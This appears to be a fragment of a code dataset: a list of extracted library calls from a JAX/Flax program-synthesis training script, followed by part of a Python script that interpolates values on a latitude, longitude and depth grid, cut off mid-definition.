'\"\"\"Hidden dimension.\"\"\"'], {}), \"('hidden_dim', 512, 'Hidden dimension.')\\n\", (1967, 2007), False, 'from absl import flags\\n'), ((2008, 2065), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_heads\"\"\"', '(4)', '\"\"\"Number of layers.\"\"\"'], {}), \"('num_heads', 4, 'Number of layers.')\\n\", (2028, 2065), False, 'from absl import flags\\n'), ((2066, 2135), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_layers\"\"\"', '(3)', '\"\"\"Number of Transformer heads.\"\"\"'], {}), \"('num_layers', 3, 'Number of Transformer heads.')\\n\", (2086, 2135), False, 'from absl import flags\\n'), ((2136, 2214), 'absl.flags.DEFINE_boolean', 'flags.DEFINE_boolean', (['\"\"\"slow_decode\"\"\"', '(True)', '\"\"\"Use slow decoding for prediction?\"\"\"'], {}), \"('slow_decode', True, 'Use slow decoding for prediction?')\\n\", (2156, 2214), False, 'from absl import flags\\n'), ((2216, 2305), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"dataset_filepattern\"\"\"', 'None', '\"\"\"Filepattern for TFRecord dataset.\"\"\"'], {}), \"('dataset_filepattern', None,\\n 'Filepattern for TFRecord dataset.')\\n\", (2235, 2305), False, 'from absl import flags\\n'), ((2322, 2414), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"per_device_batch_size\"\"\"', '(16)', '\"\"\"Number of program tasks in a batch.\"\"\"'], {}), \"('per_device_batch_size', 16,\\n 'Number of program tasks in a batch.')\\n\", (2342, 2414), False, 'from absl import flags\\n'), ((2432, 2527), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_strings_per_task\"\"\"', '(4)', '\"\"\"Number of input/output strings per task.\"\"\"'], {}), \"('num_strings_per_task', 4,\\n 'Number of input/output strings per task.')\\n\", (2452, 2527), False, 'from absl import flags\\n'), ((2545, 2636), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"max_program_length\"\"\"', '(100)', '\"\"\"Maximum number of tokens in program.\"\"\"'], {}), \"('max_program_length', 100,\\n 'Maximum number of tokens in program.')\\n\", (2565, 2636), False, 'from absl import flags\\n'), ((2654, 2758), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', 
(['\"\"\"max_characters\"\"\"', '(120)', '\"\"\"Maximum number of characters in input/output strings.\"\"\"'], {}), \"('max_characters', 120,\\n 'Maximum number of characters in input/output strings.')\\n\", (2674, 2758), False, 'from absl import flags\\n'), ((2777, 2847), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"save_dir\"\"\"', 'None', '\"\"\"Directory to save results to.\"\"\"'], {}), \"('save_dir', None, 'Directory to save results to.')\\n\", (2796, 2847), False, 'from absl import flags\\n'), ((2848, 2925), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_train_steps\"\"\"', '(2000000)', '\"\"\"Number of training steps.\"\"\"'], {}), \"('num_train_steps', 2000000, 'Number of training steps.')\\n\", (2868, 2925), False, 'from absl import flags\\n'), ((2926, 2999), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_eval_steps\"\"\"', '(10)', '\"\"\"Number of evaluation steps.\"\"\"'], {}), \"('num_eval_steps', 10, 'Number of evaluation steps.')\\n\", (2946, 2999), False, 'from absl import flags\\n'), ((3000, 3085), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"log_freq\"\"\"', '(1000)', '\"\"\"Number of steps between training logs.\"\"\"'], {}), \"('log_freq', 1000, 'Number of steps between training logs.'\\n )\\n\", (3020, 3085), False, 'from absl import flags\\n'), ((3081, 3153), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"eval_freq\"\"\"', '(2000)', '\"\"\"Number of steps between eval.\"\"\"'], {}), \"('eval_freq', 2000, 'Number of steps between eval.')\\n\", (3101, 3153), False, 'from absl import flags\\n'), ((3154, 3254), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"predict_freq\"\"\"', '(50000)', '\"\"\"Number of steps between prediction (beam search).\"\"\"'], {}), \"('predict_freq', 50000,\\n 'Number of steps between prediction (beam search).')\\n\", (3174, 3254), False, 'from absl import flags\\n'), ((3272, 3367), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"checkpoint_freq\"\"\"', '(50000)', '\"\"\"Number of steps between checkpoint saves.\"\"\"'], {}), \"('checkpoint_freq', 50000,\\n 'Number of steps between checkpoint saves.')\\n\", (3292, 3367), False, 'from absl import flags\\n'), ((3385, 3529), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"finetune_start_step\"\"\"', '(-1)', '\"\"\"Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.\"\"\"'], {}), \"('finetune_start_step', -1,\\n 'Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.'\\n )\\n\", (3405, 3529), False, 'from absl import flags\\n'), ((3566, 3671), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['\"\"\"restore_checkpoints\"\"\"', '(True)', '\"\"\"Whether to restore from existing model checkpoints.\"\"\"'], {}), \"('restore_checkpoints', True,\\n 'Whether to restore from existing model checkpoints.')\\n\", (3583, 3671), False, 'from absl import flags\\n'), ((3687, 3852), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"attention_mask_type\"\"\"', '\"\"\"bos_full_attention\"\"\"', '\"\"\"The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention\"\"\"'], {}), \"('attention_mask_type', 'bos_full_attention',\\n 'The kind of attention mask to use. 
Options are: baseline, bos_to_bos, bos_full_attention'\\n )\\n\", (3706, 3852), False, 'from absl import flags\\n'), ((3888, 3990), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['\"\"\"use_relative_attention\"\"\"', '(True)', '\"\"\"Whether to use relative positonal embeddings.\"\"\"'], {}), \"('use_relative_attention', True,\\n 'Whether to use relative positonal embeddings.')\\n\", (3905, 3990), False, 'from absl import flags\\n'), ((4005, 4131), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['\"\"\"bos_special_attention\"\"\"', '(False)', '\"\"\"Whether to use special relative attention computation for BOS tokens.\"\"\"'], {}), \"('bos_special_attention', False,\\n 'Whether to use special relative attention computation for BOS tokens.')\\n\", (4022, 4131), False, 'from absl import flags\\n'), ((4207, 4296), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"xm_parameters\"\"\"', 'None', '\"\"\"String specifying hyperparamter search.\"\"\"'], {}), \"('xm_parameters', None,\\n 'String specifying hyperparamter search.')\\n\", (4226, 4296), False, 'from absl import flags\\n'), ((7127, 7173), 'flax.training.common_utils.onehot', 'common_utils.onehot', (['targets', 'logits.shape[-1]'], {}), '(targets, logits.shape[-1])\\n', (7146, 7173), False, 'from flax.training import common_utils\\n'), ((8564, 8594), 'jax.lax.psum', 'jax.lax.psum', (['metrics', '\"\"\"batch\"\"\"'], {}), \"(metrics, 'batch')\\n\", (8576, 8594), False, 'import jax\\n'), ((9159, 9188), 'jax.random.split', 'jax.random.split', (['dropout_rng'], {}), '(dropout_rng)\\n', (9175, 9188), False, 'import jax\\n'), ((9719, 9760), 'jax.value_and_grad', 'jax.value_and_grad', (['loss_fn'], {'has_aux': '(True)'}), '(loss_fn, has_aux=True)\\n', (9737, 9760), False, 'import jax\\n'), ((9818, 9846), 'jax.lax.pmean', 'jax.lax.pmean', (['grad', '\"\"\"batch\"\"\"'], {}), \"(grad, 'batch')\\n\", (9831, 9846), False, 'import jax\\n'), ((12015, 12077), 'latent_programmer.decode.flat_batch_beam_expand', 'decode.flat_batch_beam_expand', (['encoded_padding_mask', 'beam_size'], {}), '(encoded_padding_mask, beam_size)\\n', (12044, 12077), False, 'from latent_programmer import decode\\n'), ((13395, 13607), 'latent_programmer.decode.beam_search', 'decode.beam_search', (['inputs', 'cache', 'tokens_ids_to_logits'], {'beam_size': 'beam_size', 'alpha': '(0.6)', 'bos_token': 'config.base_config.bos_token', 'eos_token': 'eos_token', 'max_decode_len': 'max_decode_len', 'slow_decode': 'slow_decode'}), '(inputs, cache, tokens_ids_to_logits, beam_size=beam_size,\\n alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token,\\n max_decode_len=max_decode_len, slow_decode=slow_decode)\\n', (13413, 13607), False, 'from latent_programmer import decode\\n'), ((14514, 14543), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\\n', (14537, 14543), False, 'import collections\\n'), ((14555, 14568), 'jax.devices', 'jax.devices', ([], {}), '()\\n', (14566, 14568), False, 'import jax\\n'), ((15633, 15656), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\\n', (15654, 15656), True, 'import tensorflow.compat.v2 as tf\\n'), ((15660, 15690), 'tensorflow.compat.v2.random.set_seed', 'tf.random.set_seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (15678, 15690), True, 'import tensorflow.compat.v2 as tf\\n'), ((15693, 15719), 'numpy.random.seed', 'np.random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (15707, 15719), True, 'import numpy as np\\n'), ((15722, 15745), 'random.seed', 'random.seed', 
(['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (15733, 15745), False, 'import random\\n'), ((16766, 16790), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\\n', (16788, 16790), False, 'import jax\\n'), ((17466, 17497), 'latent_programmer.tasks.robust_fill.tokens.build_token_tables', 'dsl_tokens.build_token_tables', ([], {}), '()\\n', (17495, 17497), True, 'from latent_programmer.tasks.robust_fill import tokens as dsl_tokens\\n'), ((18542, 18579), 'absl.logging.info', 'logging.info', (['\"\"\"Initializing dataset.\"\"\"'], {}), \"('Initializing dataset.')\\n\", (18554, 18579), False, 'from absl import logging\\n'), ((18702, 18768), 'absl.logging.info', 'logging.info', (['\"\"\"Loading dataset from %s\"\"\"', 'FLAGS.dataset_filepattern'], {}), \"('Loading dataset from %s', FLAGS.dataset_filepattern)\\n\", (18714, 18768), False, 'from absl import logging\\n'), ((18837, 18885), 'absl.logging.info', 'logging.info', (['\"\"\"padded_shapes: %s\"\"\"', 'padded_shapes'], {}), \"('padded_shapes: %s', padded_shapes)\\n\", (18849, 18885), False, 'from absl import logging\\n'), ((18898, 19004), 'latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record', 'input_pipeline.create_dataset_from_tf_record', (['FLAGS.dataset_filepattern', 'token_id_table', 'char_id_table'], {}), '(FLAGS.dataset_filepattern,\\n token_id_table, char_id_table)\\n', (18942, 19004), False, 'from latent_programmer.decomposition_transformer_attention import input_pipeline\\n'), ((20156, 20330), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig', 'models.DecomposeAttentionTransformerConfig', ([], {'base_config': 'base_config', 'attention_mask_type': 'FLAGS.attention_mask_type', 'bos_special_attention': 'FLAGS.bos_special_attention'}), '(base_config=base_config,\\n attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=\\n FLAGS.bos_special_attention)\\n', (20198, 20330), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((20897, 20927), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (20915, 20927), False, 'import jax\\n'), ((20993, 21014), 'jax.random.split', 'jax.random.split', (['rng'], {}), '(rng)\\n', (21009, 21014), False, 'import jax\\n'), ((21022, 21071), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['eval_config'], {}), '(eval_config)\\n', (21058, 21071), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((21301, 21393), 'flax.optim.Adam', 'optim.Adam', (['FLAGS.lr'], {'beta1': '(0.9)', 'beta2': '(0.98)', 'eps': '(1e-09)', 'weight_decay': 'FLAGS.weight_decay'}), '(FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-09, weight_decay=FLAGS.\\n weight_decay)\\n', (21311, 21393), False, 'from flax import optim\\n'), ((22201, 22231), 'flax.jax_utils.replicate', 'jax_utils.replicate', (['optimizer'], {}), '(optimizer)\\n', (22220, 22231), False, 'from flax import jax_utils\\n'), ((23679, 23690), 'time.time', 'time.time', ([], {}), '()\\n', (23688, 23690), False, 'import time\\n'), ((30635, 30648), 'absl.app.run', 'app.run', (['main'], {}), '(main)\\n', (30642, 30648), False, 'from absl import app\\n'), ((6479, 6514), 'jax.numpy.asarray', 'jnp.asarray', (['ret'], {'dtype': 'jnp.float32'}), '(ret, dtype=jnp.float32)\\n', (6490, 6514), True, 'import jax.numpy as 
jnp\\n'), ((7274, 7300), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\\n', (7285, 7300), True, 'import jax.numpy as jnp\\n'), ((8008, 8035), 'jax.numpy.argmax', 'jnp.argmax', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\\n', (8018, 8035), True, 'import jax.numpy as jnp\\n'), ((8078, 8104), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\\n', (8089, 8104), True, 'import jax.numpy as jnp\\n'), ((10914, 10935), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\\n', (10932, 10935), False, 'import jax\\n'), ((10943, 10972), 'jax.numpy.ones', 'jnp.ones', (['inputs.shape', 'dtype'], {}), '(inputs.shape, dtype)\\n', (10951, 10972), True, 'import jax.numpy as jnp\\n'), ((10980, 11010), 'jax.numpy.ones', 'jnp.ones', (['outputs.shape', 'dtype'], {}), '(outputs.shape, dtype)\\n', (10988, 11010), True, 'import jax.numpy as jnp\\n'), ((11018, 11047), 'jax.numpy.ones', 'jnp.ones', (['target_shape', 'dtype'], {}), '(target_shape, dtype)\\n', (11026, 11047), True, 'import jax.numpy as jnp\\n'), ((14867, 14899), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x[0])', 'xs'], {}), '(lambda x: x[0], xs)\\n', (14879, 14899), False, 'import jax\\n'), ((16797, 16810), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (16808, 16810), False, 'import jax\\n'), ((20960, 20973), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (20971, 20973), False, 'import jax\\n'), ((21094, 21109), 'jax.jit', 'jax.jit', (['m.init'], {}), '(m.init)\\n', (21101, 21109), False, 'import jax\\n'), ((21166, 21197), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\\n', (21174, 21197), True, 'import jax.numpy as jnp\\n'), ((21205, 21236), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\\n', (21213, 21236), True, 'import jax.numpy as jnp\\n'), ((21244, 21280), 'jax.numpy.ones', 'jnp.ones', (['program_shape', 'jnp.float32'], {}), '(program_shape, jnp.float32)\\n', (21252, 21280), True, 'import jax.numpy as jnp\\n'), ((21867, 21931), 'absl.logging.info', 'logging.info', (['\"\"\"Found model checkpointed at step %d.\"\"\"', 'start_step'], {}), \"('Found model checkpointed at step %d.', start_step)\\n\", (21879, 21931), False, 'from absl import logging\\n'), ((22670, 22760), 'functools.partial', 'functools.partial', (['train_step'], {'learning_rate_fn': 'learning_rate_fn', 'config': 'train_config'}), '(train_step, learning_rate_fn=learning_rate_fn, config=\\n train_config)\\n', (22687, 22760), False, 'import functools\\n'), ((22845, 22914), 'functools.partial', 'functools.partial', (['eval_step'], {'eos_token': 'eos_token', 'config': 'eval_config'}), '(eval_step, eos_token=eos_token, config=eval_config)\\n', (22862, 22914), False, 'import functools\\n'), ((23022, 23125), 'functools.partial', 'functools.partial', (['initialize_cache'], {'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config'}), '(initialize_cache, max_decode_len=FLAGS.max_program_length,\\n config=predict_config)\\n', (23039, 23125), False, 'import functools\\n'), ((23211, 23363), 'functools.partial', 'functools.partial', (['predict_step'], {'eos_token': 'eos_token', 'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config', 'slow_decode': 'FLAGS.slow_decode'}), '(predict_step, eos_token=eos_token, max_decode_len=FLAGS.\\n max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode)\\n', (23228, 23363), False, 'import functools\\n'), ((23614, 23638), 'jax.local_device_count', 
'jax.local_device_count', ([], {}), '()\\n', (23636, 23638), False, 'import jax\\n'), ((9202, 9231), 'jax.numpy.where', 'jnp.where', (['(programs > 0)', '(1)', '(0)'], {}), '(programs > 0, 1, 0)\\n', (9211, 9231), True, 'import jax.numpy as jnp\\n'), ((10440, 10484), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (10476, 10484), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((10857, 10901), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (10893, 10901), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((11936, 11964), 'jax.numpy.where', 'jnp.where', (['(outputs > 0)', '(1)', '(0)'], {}), '(outputs > 0, 1, 0)\\n', (11945, 11964), True, 'import jax.numpy as jnp\\n'), ((14151, 14176), 'numpy.tile', 'np.tile', (['x[-1]', 'tile_dims'], {}), '(x[-1], tile_dims)\\n', (14158, 14176), True, 'import numpy as np\\n'), ((14696, 14716), 'jax.lax.psum', 'jax.lax.psum', (['x', '\"\"\"i\"\"\"'], {}), \"(x, 'i')\\n\", (14708, 14716), False, 'import jax\\n'), ((16873, 16919), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '\"\"\"tb\"\"\"', 'hparam_str'], {}), \"(FLAGS.save_dir, 'tb', hparam_str)\\n\", (16885, 16919), False, 'import os\\n'), ((19322, 19346), 'numpy.ceil', 'np.ceil', (['(batch_size / 10)'], {}), '(batch_size / 10)\\n', (19329, 19346), True, 'import numpy as np\\n'), ((21730, 21785), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '\"\"\"checkpoints\"\"\"', 'hparam_str'], {}), \"(FLAGS.save_dir, 'checkpoints', hparam_str)\\n\", (21742, 21785), False, 'import os\\n'), ((21976, 22092), 'absl.logging.info', 'logging.info', (['\"\"\"Checking that start_step (%s) == finetune_start_step (%s)\"\"\"', 'start_step', 'FLAGS.finetune_start_step'], {}), \"('Checking that start_step (%s) == finetune_start_step (%s)',\\n start_step, FLAGS.finetune_start_step)\\n\", (21988, 22092), False, 'from absl import logging\\n'), ((24500, 24543), 'absl.logging.info', 'logging.info', (['\"\"\"Gathering training metrics.\"\"\"'], {}), \"('Gathering training metrics.')\\n\", (24512, 24543), False, 'from absl import logging\\n'), ((24564, 24601), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['metrics_all'], {}), '(metrics_all)\\n', (24588, 24601), False, 'from flax.training import common_utils\\n'), ((24674, 24708), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'metrics_all'], {}), '(jnp.sum, metrics_all)\\n', (24686, 24708), False, 'import jax\\n'), ((24777, 24830), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / denominator)', 'metrics_sums'], {}), '(lambda x: x / denominator, metrics_sums)\\n', (24789, 24830), False, 'import jax\\n'), ((25673, 25718), 'absl.logging.info', 'logging.info', (['\"\"\"Gathering evaluation metrics.\"\"\"'], {}), \"('Gathering evaluation metrics.')\\n\", (25685, 25718), False, 'from absl import logging\\n'), ((25746, 25757), 'time.time', 'time.time', ([], {}), '()\\n', (25755, 25757), False, 'import time\\n'), ((26031, 26069), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['eval_metrics'], {}), '(eval_metrics)\\n', (26055, 26069), False, 'from flax.training import common_utils\\n'), ((26096, 26131), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 
'eval_metrics'], {}), '(jnp.sum, eval_metrics)\\n', (26108, 26131), False, 'import jax\\n'), ((26215, 26278), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / eval_denominator)', 'eval_metrics_sums'], {}), '(lambda x: x / eval_denominator, eval_metrics_sums)\\n', (26227, 26278), False, 'import jax\\n'), ((26753, 26799), 'absl.logging.info', 'logging.info', (['\"\"\"Gathering beam search metrics.\"\"\"'], {}), \"('Gathering beam search metrics.')\\n\", (26765, 26799), False, 'from absl import logging\\n'), ((7209, 7231), 'flax.linen.log_softmax', 'nn.log_softmax', (['logits'], {}), '(logits)\\n', (7223, 7231), True, 'from flax import linen as nn\\n'), ((9332, 9376), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (9368, 9376), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((11711, 11755), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (11747, 11755), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((14794, 14829), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((1,) + x.shape)'], {}), '(x, (1,) + x.shape)\\n', (14810, 14829), True, 'import jax.numpy as jnp\\n'), ((16452, 16483), 'json.loads', 'json.loads', (['FLAGS.xm_parameters'], {}), '(FLAGS.xm_parameters)\\n', (16462, 16483), False, 'import json\\n'), ((24132, 24145), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (24143, 24145), False, 'import jax\\n'), ((25038, 25062), 'jax.numpy.exp', 'jnp.exp', ([\"summary['loss']\"], {}), \"(summary['loss'])\\n\", (25045, 25062), True, 'import jax.numpy as jnp\\n'), ((25087, 25100), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (25098, 25100), False, 'import jax\\n'), ((25115, 25183), 'absl.logging.info', 'logging.info', (['\"\"\"Train in step: %d, loss: %.4f\"\"\"', 'step', \"summary['loss']\"], {}), \"('Train in step: %d, loss: %.4f', step, summary['loss'])\\n\", (25127, 25183), False, 'from absl import logging\\n'), ((25199, 25210), 'time.time', 'time.time', ([], {}), '()\\n', (25208, 25210), False, 'import time\\n'), ((25868, 25895), 'flax.training.common_utils.shard', 'common_utils.shard', (['batches'], {}), '(batches)\\n', (25886, 25895), False, 'from flax.training import common_utils\\n'), ((26348, 26361), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (26359, 26361), False, 'import jax\\n'), ((26871, 26882), 'time.time', 'time.time', ([], {}), '()\\n', (26880, 26882), False, 'import time\\n'), ((5777, 5814), 'jax.numpy.minimum', 'jnp.minimum', (['(1.0)', '(step / warmup_steps)'], {}), '(1.0, step / warmup_steps)\\n', (5788, 5814), True, 'import jax.numpy as jnp\\n'), ((10276, 10361), 'jax.numpy.logical_and', 'jnp.logical_and', (['(programs != config.base_config.bos_token)', '(programs != eos_token)'], {}), '(programs != config.base_config.bos_token, programs != eos_token\\n )\\n', (10291, 10361), True, 'import jax.numpy as jnp\\n'), ((12255, 12306), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\\n', (12291, 12306), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((12693, 12744), 
'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\\n', (12729, 12744), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((24254, 24309), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '\"\"\"checkpoints\"\"\"', 'hparam_str'], {}), \"(FLAGS.save_dir, 'checkpoints', hparam_str)\\n\", (24266, 24309), False, 'import os\\n'), ((24323, 24355), 'flax.jax_utils.unreplicate', 'jax_utils.unreplicate', (['optimizer'], {}), '(optimizer)\\n', (24344, 24355), False, 'from flax import jax_utils\\n'), ((27557, 27587), 'flax.training.common_utils.shard', 'common_utils.shard', (['pred_batch'], {}), '(pred_batch)\\n', (27575, 27587), False, 'from flax.training import common_utils\\n'), ((29522, 29574), 'jax.tree_map', 'jax.tree_map', (['np.array', '(pred_acc, pred_denominator)'], {}), '(np.array, (pred_acc, pred_denominator))\\n', (29534, 29574), False, 'import jax\\n'), ((29972, 29985), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (29983, 29985), False, 'import jax\\n'), ((26458, 26469), 'time.time', 'time.time', ([], {}), '()\\n', (26467, 26469), False, 'import time\\n'), ((28579, 28611), 'absl.logging.info', 'logging.info', (['\"\"\"ios: %s\"\"\"', 'ios[-1]'], {}), \"('ios: %s', ios[-1])\\n\", (28591, 28611), False, 'from absl import logging\\n'), ((28624, 28663), 'absl.logging.info', 'logging.info', (['\"\"\"target: %s\"\"\"', 'targets[-1]'], {}), \"('target: %s', targets[-1])\\n\", (28636, 28663), False, 'from absl import logging\\n'), ((5873, 5910), 'jax.numpy.maximum', 'jnp.maximum', (['(1.0)', '(step - warmup_steps)'], {}), '(1.0, step - warmup_steps)\\n', (5884, 5910), True, 'import jax.numpy as jnp\\n'), ((5972, 5994), 'jax.numpy.sqrt', 'jnp.sqrt', (['warmup_steps'], {}), '(warmup_steps)\\n', (5980, 5994), True, 'import jax.numpy as jnp\\n'), ((18178, 18209), 'numpy.argmax', 'np.argmax', (['(program == eos_token)'], {}), '(program == eos_token)\\n', (18187, 18209), True, 'import numpy as np\\n'), ((30196, 30207), 'time.time', 'time.time', ([], {}), '()\\n', (30205, 30207), False, 'import time\\n'), ((6019, 6050), 'jax.numpy.maximum', 'jnp.maximum', (['step', 'warmup_steps'], {}), '(step, warmup_steps)\\n', (6030, 6050), True, 'import jax.numpy as jnp\\n'), ((27309, 27349), 'numpy.ceil', 'np.ceil', (['(cur_pred_batch_size / n_devices)'], {}), '(cur_pred_batch_size / n_devices)\\n', (27316, 27349), True, 'import numpy as np\\n'), ((6365, 6399), 'jax.numpy.cos', 'jnp.cos', (['(jnp.pi * (progress % 1.0))'], {}), '(jnp.pi * (progress % 1.0))\\n', (6372, 6399), True, 'import jax.numpy as jnp\\n')]"}}},{"rowIdx":798,"cells":{"code":{"kind":"string","value":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport click\nimport numba\n\n\ndef prepare_data(data_pd, parameter):\n lon_set = set(data_pd[\"lon\"])\n lat_set = set(data_pd[\"lat\"])\n dep_set = set(data_pd[\"dep\"])\n\n lon_list = sorted(lon_set)\n lat_list = sorted(lat_set)\n dep_list = sorted(dep_set)\n\n lon_mesh, lat_mesh, dep_mesh = np.meshgrid(\n lon_list, lat_list, dep_list, indexing=\"ij\")\n dx, dy, dz = np.shape(lon_mesh)\n value_mesh = np.zeros_like(lon_mesh)\n x_mesh = np.zeros_like(lon_mesh)\n y_mesh = np.zeros_like(lon_mesh)\n z_mesh = np.zeros_like(lon_mesh)\n r_mesh = np.zeros_like(lon_mesh)\n for i in range(dx):\n for j in range(dy):\n for k in range(dz):\n x_mesh[i, j, k], y_mesh[i, j, k], 
z_mesh[i, j, k], r_mesh[i, j, k] = lld2xyzr(\n lat_mesh[i, j, k], lon_mesh[i, j, k], dep_mesh[i, j, k])\n\n for index, row in data_pd.iterrows():\n i = int(round((row.lon-lon_list[0])/(lon_list[1]-lon_list[0]), 0))\n j = int(round((row.lat-lat_list[0])/(lat_list[1]-lat_list[0]), 0))\n k = int(round((row.dep-dep_list[0])/(dep_list[1]-dep_list[0]), 0))\n value_mesh[i, j, k] = row[parameter]\n\n return x_mesh, y_mesh, z_mesh, value_mesh\n\n\ndef get_value(data_pd, lat, lon, dep, parameter):\n return data_pd.loc[(data_pd.lat == lat) & (data_pd.lon == lon) & (data_pd.dep == dep)][parameter].values[0]\n\n\n@numba.njit()\ndef lld2xyzr(lat, lon, dep):\n R_EARTH_KM = 6371.0\n r = (R_EARTH_KM-dep)/R_EARTH_KM\n theta = 90-lat\n phi = lon\n\n z = r*cosd(theta)\n h = r*sind(theta)\n x = h*cosd(phi)\n y = h*sind(phi)\n\n return (x, y, z, r)\n\n\n@numba.njit()\ndef cosd(x):\n return np.cos(np.deg2rad(x))\n\n\n@numba.njit()\ndef sind(x):\n return np.sin(np.deg2rad(x))\n\n\n# def get_value_func(x_mesh, y_mesh, z_mesh, value_mesh):\n# value_func = RegularGridInterpolator(\n# (x_mesh, y_mesh, z_mesh), value_mesh, method=\"nearest\")\n# return value_func\n\n\n@numba.njit()\ndef interp_value(lat, lon, dep, x_mesh, y_mesh, z_mesh, value_mesh):\n x, y, z, _ = lld2xyzr(lat, lon, dep)\n distance2 = (x_mesh-x)**2+(y_mesh-y)**2+(z_mesh-z)**2\n mindistance2 = np.min(distance2)\n coors = np.where(distance2 == mindistance2)\n value = value_mesh[coors[0][0], coors[1][0], coors[2][0]]\n return value\n\n\ndef generate_vertical_profile_grids(lon_list, lat_list, dep_list, hnpts, vnpts):\n lons = np.linspace(lon_list[0], lon_list[1], hnpts)\n lats = np.linspace(lat_list[0], lat_list[1], hnpts)\n deps = np.linspace(dep_list[0], dep_list[1], vnpts)\n return lons, lats, deps\n\n\n@click.command()\n@click.option('--lon1', required=True, type=float, help=\"lon1\")\n@click.option('--lon2', required=True, type=float, help=\"lon2\")\n@click.option('--lat1', required=True, type=float, help=\"lat1\")\n@click.option('--lat2', required=True, type=float, 